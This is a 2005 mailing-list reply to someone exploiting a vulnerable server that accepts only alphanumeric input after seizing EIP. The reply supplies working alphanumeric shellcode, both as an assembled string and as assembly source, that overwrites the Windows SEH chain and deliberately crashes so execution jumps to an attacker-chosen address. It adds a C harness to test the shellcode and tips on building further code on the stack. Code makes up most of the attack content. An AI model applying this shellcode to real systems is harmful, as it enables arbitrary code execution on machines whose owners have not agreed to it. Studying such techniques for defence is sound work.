Re: AlphaNumeric Exploitation Help

[Costin Ionescu <costin.ionescu () gmail com>]

On 26 May 2005 11:38:25 -0000, ramatkal () hotmail com
<ramatkal () hotmail com> wrote:
> I am trying to exploit a vulnerable server which only allows
> alphanumeric characters....
>
> I have successfully taken control of EIP and now need to do a JUMP -600
> bytes.....
>
> The problem is, that 'eb' and 'e9' are not alphanumeric asci codes and
> thus cannot be used to do the jumps in the payload....
>
> Anyone got any ideas/tricks/advice on how i can accomplish a JMP -600 bytes, or any type of jump for that matter, 
> only using alphanumeric chars?

I assume you're exploiting a IA32 machine running Windows. I also
assume that you know the address where you want to jump to - let's say
you have it in ECX.

Here's the code assembled: %!!!!%@@@@P_d38d18QWd1 l
And the source:
and eax, 21212121h
and eax, 40404040h ; eax = 0
push eax
pop edi ; edi = 0
xor edi, [fs:eax] ; edi = last SEH frame
xor [fs:eax], edi ; fs:[0] = 0
push ecx ; where you want to jump to
push edi ; previous SEH frame
xor [fs:eax], esp ; set the new SEH frame
insb ; crash to run your SEH

Here's also a small C code to test this:
#include <stdio.h>
typedef void (__fastcall *  FN) (void* addr);
void kaboom () { printf("kaboom\n"); exit(0); }
char* shell = "%!!!!%@@@@P_d38d18QWd1 l";
void main (void)
    {
    FN f = (FN) shell;
    f(&kaboom);
    }

Now, if you don't know the address where you want to jump to, you must
instead know the address of your code to compute the jump target. If
you don't know that either, you generate your code on the stack (using
nice alphanumeric opcodes), use the method above to pass control to it
(setting before ecx to esp). You can generate the code on the stack to
use the full instruction set so from there it gets really boring ;-)

Cheers,

Costin